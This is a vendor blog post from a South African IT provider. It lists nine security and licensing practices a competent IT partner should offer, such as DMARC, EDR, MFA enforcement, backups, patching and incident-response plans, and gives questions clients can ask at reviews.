Get Started
Why Your IT Partner Should Be Offering You This (And What to Ask If They're Not)
field note · IT Strategy

Why Your IT Partner Should Be Offering You This (And What to Ask If They're Not)

Nine things a competent 2026 IT partner should be doing for you, and the questions to ask if your MSP isn't, without burning the relationship.

Cathleen Ogier · founder 08 May 2026 9 min read

At year one, your IT partner was enthusiastic. They sent a 12-page scope of work. They had opinions about your backup strategy. They followed up twice.

By year five, the invoice processes automatically. The last proactive communication you got from them was a price increase. When you ask how things are going, the answer is “fine.”

“Fine” is doing a lot of work in that sentence.

Threats don’t stay fine. The compliance bar moves. Microsoft and Google ship security features you’re already paying for and nobody switches them on. A partner who isn’t pushing those into your environment is, functionally, being paid to stand still. The problem isn’t that they’ve turned malicious. It’s that they’ve turned furniture.

Nine things follow. Not gold-plating. The floor. If your partner is doing all nine, you have a good one and none of this is about you. If they’re not, the conversation script at the bottom is how you raise it without turning the next review into a tribunal.

DMARC monitoring and management: are you covered?

The 2026 minimum is a record at p=reject. Not p=none, which is the email security equivalent of installing a smoke detector and removing the battery because the beeping was annoying. P=none monitors. P=reject protects. A comfortable partner rarely explains the difference.

What we find on inherited tenants: p=none published in 2021 and never moved. The reporting address pointing at an aggregator account the previous IT person stopped logging into two years ago. Phishing impersonating the domain still reaching customers, because the policy says “do nothing” and that is exactly what happens.

If your partner set up DMARC once and moved on, ask for the current policy tag and where the reports go. The TamingDNS DMARC analyser shows you the same view in about 30 seconds. So will they, if they’re across it.

If you want another reason to get to p=reject, read Cyber Insurance and DMARC: What Underwriters Actually Want to See.

EDR, not just AV: what is actually on your endpoints?

Antivirus catches commodity malware on signature. Endpoint Detection and Response records the process tree, command-line activity, registry changes and network connections, then correlates them into something a human analyst can read.

The attacks we respond to now almost never trip a signature. They use signed Windows binaries (certutil.exe, bitsadmin.exe, mshta.exe) in sequences antivirus reads as normal binaries doing normal things. EDR reads the sequence. That’s the difference between catching something and writing the incident report.

A competent partner has EDR on every endpoint (macOS and Linux servers included) with a named human watching the alerts. If the answer to “what are we running on endpoints?” is “you’ve got antivirus, you’re covered,” that’s a 2018 answer to a 2026 threat picture.

For the broader Bitdefender picture, see the Bitdefender page.

Conditional Access and MFA enforcement: is it actually enforced?

MFA switched on is not the same as MFA enforced. Eight out of ten M365 Business Premium tenants we audit have at least one Conditional Access gap. Usually a service account excluded three years ago for convenience and forgotten since. Sometimes legacy authentication is still enabled, meaning an attacker can reach Exchange over IMAP and the MFA prompt never fires at all.

The 2026 baseline: legacy authentication blocked tenant-wide, MFA required for all users, compliant device required for desktop access to Exchange and SharePoint, phishing-resistant MFA for admins. Tested quarterly for drift, because these policies drift on their own without anyone touching them.

Ask for a one-page diagram of your current Conditional Access policies. If your partner can’t produce one, the policies aren’t being managed. They’re being assumed.

The walkthrough is on the Microsoft 365 page.

Quarterly licence right-sizing: who is watching the bill?

Microsoft and Google sell on the assumption that nobody looks closely. On every tenant we audit there is at least one of the following: Business Premium seats assigned to accounts that left 18 months ago, E3 licences on frontline staff who have never opened Outlook, archive add-ons paid for and never used, Teams Phone licences on accounts that have never made a call.

On a 100-seat tenant the savings from a proper audit typically pay for the audit several times over. A competent partner runs this at every renewal without being asked and sends a written summary: what each user is licensed for, what they actually use, what should change.

If yours has never produced this report, the savings have been sitting in your invoice undisturbed. Ask for it.

Encrypted endpoints with managed recovery keys: where are they stored?

Every laptop should have full disk encryption running. BitLocker on Windows, FileVault on macOS. The interesting question isn’t whether encryption is on. It’s where the recovery key lives.

Recovery keys belong in a system the business controls and can audit: Intune for M365 shops, Hexnode for mixed fleets, GravityZone for endpoint-managed environments. Exportable, auditable, and recoverable on a Sunday evening when someone forgets their password before a Monday board meeting, which is when these situations reliably occur.

What we still find in 2026: laptops encrypted, recovery key escrowed only in the user’s personal Microsoft account. The day they leave, the disk gets wiped and reused, and anything that wasn’t backed up off it is gone. Ask where your recovery keys are. The answer should name a specific console, not gesture vaguely at the cloud.

The full picture is on the MDM page, and the trade-off between products is covered at FDE: Bitdefender vs Intune.

Periodic SaaS backup verification: do you have a tested restore?

Microsoft 365 and Google Workspace back up their own infrastructure, not your data. Content deleted by a user, a script, or a departing employee is gone after the platform’s native retention window: 30 days for most M365 content types, 14 days for OneDrive deleted items, 25 days for Google Vault-covered content.

A third party backup product (Acronis, Datto, Druva, AvePoint, Spanning) addresses this. The licence alone is not the answer. A tested restore is: a document showing the date of the last test, the data scope, the time it took, the engineer who ran it.

Most partners we audit have the licence. Very few have ever run a restore test. Ask for the most recent restore-test report. If it doesn’t exist, the backup doesn’t really exist in any operational sense.

Patching reports you actually read: when did Chrome last update?

The most common cause of compromise in our incident-response work is not a zero-day. It’s an unpatched browser plugin or PDF reader where the CVE was published six weeks earlier, the patch was available, and nobody pushed it.

A 2026 partner runs patch management for the OS and the third party long tail: Chrome, Adobe Reader, Zoom, 7-Zip, line-of-business apps with their own opaque release cadences. Monthly reports showing coverage by app, by patch age, by endpoint. A monthly email that says “everything is fine” without a report attached is not patch management. It is optimism dressed as a status update.

The Bitdefender setup is covered in our patch management documentation; the Intune approach lives on the Microsoft 365 page.

A documented incident-response plan: what happens at 2am?

The first thing a cyber-insurance underwriter asks for, after the policy posture, is the incident-response plan. The second is the date of the last tabletop exercise.

A real IR plan names specific people with specific contact numbers, defines who declares an incident, who calls breach counsel, who notifies the Information Regulator under POPIA Section 22. It has a runbook for the scenarios that actually happen: ransomware on a laptop, a forwarding rule on a CFO mailbox, a token replay against an admin account. Dated, signed, and rehearsed at least once a year with the people named in it.

If your partner’s IR plan is a Word document from 2019, ask for the current version. If there isn’t one, you are improvising at 2am. That’s a hard way to find out what you actually have.

Honest answers about lock-in: who owns the keys?

Who is the global admin on your M365 tenant? Whose name is on the domain registrar account? Where are your DNS records hosted and who can change them? If the relationship ended next month, what does the exit actually look like?

A trustworthy partner answers all of this plainly, in writing, without a three-day delay. Licences billed through them as a Cloud Solution Provider, but the tenant belongs to the client. DNS in an account the client controls. Break-glass credentials sealed and held by the client. Exit ramp documented in the contract from day one.

A partner who goes quiet on any of these has structured the engagement to favour themselves. That’s not automatically malicious. Worth knowing before you need to know it.

What to ask if they’re not doing this

You don’t have to make this a confrontation. Most partners respond well to a client who has done the reading and arrives with specific questions rather than vague dissatisfaction. Bring receipts, not accusations.

Ask these in writing at your next review:

  1. “Show me our DMARC posture: the policy tag, where reports go, when we last moved the policy.”
  2. “What’s our EDR coverage by operating system (Windows, macOS, Linux servers), and who reads the alerts?”
  3. “Send me the most recent licence right-sizing report.”
  4. “Where are our recovery keys? Which console, which export path, which named owner?”
  5. “When did we last test a SaaS restore? Date, scope, engineer.”
  6. “Send me the current incident-response plan, dated.”
  7. “Walk me through our Conditional Access policies.”
  8. “What does our exit look like if we end the relationship?”

Take notes. A partner who comes back with a costed remediation plan is worth keeping. One who tells you “it’s fine” without showing the receipts has a contract that’s overdue for review.

Where OSH fits in

We wrote this because we keep inheriting the aftermath of partners who weren’t doing these nine things. We deploy and manage M365, Google Workspace, DMARC, GravityZone, Hexnode and Intune for South African and international SMEs as a Cloud Solution Provider, with the keys where they belong and reports landing in the client’s inbox monthly. How we engage is set out on the services and professional services pages.

Get a free 60-minute IT-partner quality assessment

Book a 60-minute call. We map your current coverage against the nine items above, produce a written gap report, and name the three things your current partner should be doing differently. Yours to keep whether you engage us or not.

If your partner is doing all nine, you get a written confirmation that’s useful at your next cyber-insurance renewal. If not, you have the receipts for the conversation above.

Email support@osh.co.za or use the form on the contact page.

More in this series: Reseller vs Direct

  1. Reseller or Direct? When to Buy Cloud Software From a Partner vs the Vendor
  2. Why Your IT Partner Should Be Offering You This (And What to Ask If They're Not) (Current)
  3. How to Lock Down Your Reseller From Owning Your Stuff
// filed under it strategy back to field notes
keep reading

More field notes

all posts →
// it strategy
// it strategy 12 min

How to Lock Down Your Reseller From Owning Your Stuff

May 2026 Read →
// it strategy
// it strategy 13 min

Reseller or Direct? When to Buy Cloud Software From a Partner vs the Vendor

May 2026 Read →

Ready to migrate?

Whether you need a full M365 migration plan or a security audit, our team is ready to architect your cloud future.

Email us directly support@osh.co.za